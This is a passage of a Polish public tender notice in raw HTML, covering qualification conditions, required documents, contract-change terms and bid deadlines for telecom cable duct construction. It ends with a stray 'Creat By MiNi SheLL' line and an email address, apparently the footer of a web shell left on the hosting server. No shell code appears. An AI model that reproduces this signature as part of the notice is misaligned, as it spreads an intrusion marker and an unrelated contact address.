takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>-	Wykonawca musi wykazać wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch zamówień, których przedmiotem była budowa kanalizacji teletechnicznej (lub rurociągów kablowych) o wartości brutto nie mniejszej niż 100.000,00 złotych każda,<br/>-	Wykonawca musi wykazać, że na okres realizacji zamówienia będzie dysponował osobą przynależącą do właściwej izby samorządu zawodowego, z uprawnieniami budowlanymi w specjalności telekomunikacyjnej lub odpowiadającymi im uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów prawa, która będzie pełnić funkcję kierownika budowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">podpisane oświadczenie wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru określonego w Załączniku nr 2 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykaz co najmniej dwóch robót budowlanych o których mowa w Rozdziale IX pkt 1.4.1, wykonanych nie wcześniej niż w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie - sporządzonego według wzoru określonego w Załączniku nr 4 do SWZ. Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; <br/>- wykaz osób, o których mowa w Rozdziale IX pkt 1.4.2, skierowanych przez wykonawcę do realizacji zamówienia w szczególności odpowiedzialnych za kierowanie robotami, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - sporządzonego według wzoru określonego w Załączniku nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kompletna oferta musi zawierać:<br/>3.1.	wypełniony formularz ofertowy - zgodny z Załącznikiem nr 1 do SWZ,<br/>3.2.	oświadczenie wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – Załącznik nr 2 do SWZ;<br/>3.3.	zobowiązanie podmiotu, na którego zasoby powołuje się wykonawca lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu (jeżeli dotyczy);<br/>3.4.	oświadczenie podmiotu, na którego zasoby powołuje się wykonawca, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – Załącznik nr 2 do SWZ (jeżeli dotyczy);<br/>3.5.	stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpowiedniego rejestru oraz w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, ustanawiające pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.<br/>3.6.	oświadczenie zgodnie z art. 117 ust. 4 ustawy (dotyczy wyłącznie wykonawców wspólnie ubiegających się o zamówienie) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w pkt 1, wykonawcy ustanawiają pełnomocnika do reprezentowania<br/>ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Pełnomocnictwo, podpisane przez prawnie<br/>upoważnionych przedstawicieli każdego z wykonawców, musi zostać dołączone do oferty.<br/>3. Oświadczenia zgodnie z art. 125 ust. 1 Ustawy, składa każdy z wykonawców wspólnie ubiegających<br/>się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie<br/>zgodnie z art. 117 ust. 4 Ustawy, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy<br/>5. Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wyłoniona<br/>w prowadzonym postępowaniu jako najkorzystniejsza, przed zawarciem umowy, zamawiający<br/>zażąda kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany umowy w zakresie:<br/>1.1. zmianę zakresu Przedmiotu Zamówienia (zwiększenie/zmniejszenie) i/lub zmianę wartości<br/>Przedmiotu Zamówienia (zwiększenie/zmniejszenie) w przypadku konieczności wykonania<br/>robót zamiennych lub dodatkowych robót budowlanych nieobjętych zakresem opisanym w<br/>przedmiarach jednakże zgodnego z zamierzeniem inwestycyjnym opisanym w dokumentacji<br/>projektowej, zasadami wiedzy technicznej i/lub obowiązującymi na dzień odbioru robót<br/>przepisami wykonania Przedmiotu Zamówienia, pozwalających na zaoszczędzenie kosztów<br/>wykonywanych prac, jak również kosztów eksploatacji wykonanego Przedmiotu Zamówienia,<br/>22<br/>1.2. rezygnacji z wykonywania części (elementów) Przedmiotu Zamówienia przewidzianych w<br/>Dokumentacji Projektowej tzw. „roboty zaniechane” w sytuacji, gdy ich wykonanie będzie<br/>zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi<br/>przepisami wykonania przedmiotu zamówienia,<br/>1.3. zmiany danych teleadresowych Wykonawcy,<br/>1.4. ustawowej zmiany stawki podatku VAT,<br/>1.5. zmiany terminu realizacji umowy w przypadku:<br/> działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej<br/>bezpośredni wpływ na terminowość wykonywania robót,<br/> wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo<br/>zachowania należytej staranności,<br/> wykopalisk uniemożliwiających wykonywanie robót,<br/> wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót,<br/> braku odpowiednich zgód lub przedłużających się procedur administracyjnych, związanych<br/>m.in. z wydaniem przez uprawnione organy niezbędnych do wykonania przedmiotu umowy<br/>decyzji i zezwoleń,<br/> wydania aktów administracyjnych zmieniających stan prawny znany stronom na dzień<br/>zawarcia umowy,<br/> wystąpienia roszczeń osób trzecich w związku z realizacją umowy.<br/> wystąpienia w trakcie realizacji umowy zamówień dodatkowych i/lub zamiennych,<br/>związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony<br/>termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia),<br/>1.6. innym, niż wskazany w ppkt a) - e), jeżeli zmiana umowy nie jest istotna w rozumieniu art.<br/>454 ust. 2 Ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-28 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem Platformy znajdującej się pod adresem: https://plodz.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-28 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagane terminy realizacji przedmiotu zamówienia:<br/>a) wykonanie robót budowlanych: do 13 tygodni od zawarcia umowy<br/>b) formalno-prawne zakończenie budowy: do 12 tygodni od zakończenia robót budowlanych (tj. od<br/>terminu podpisania technicznego protokołu odbioru).

Creat By MiNi SheLL
Email: jattceo@gmail.com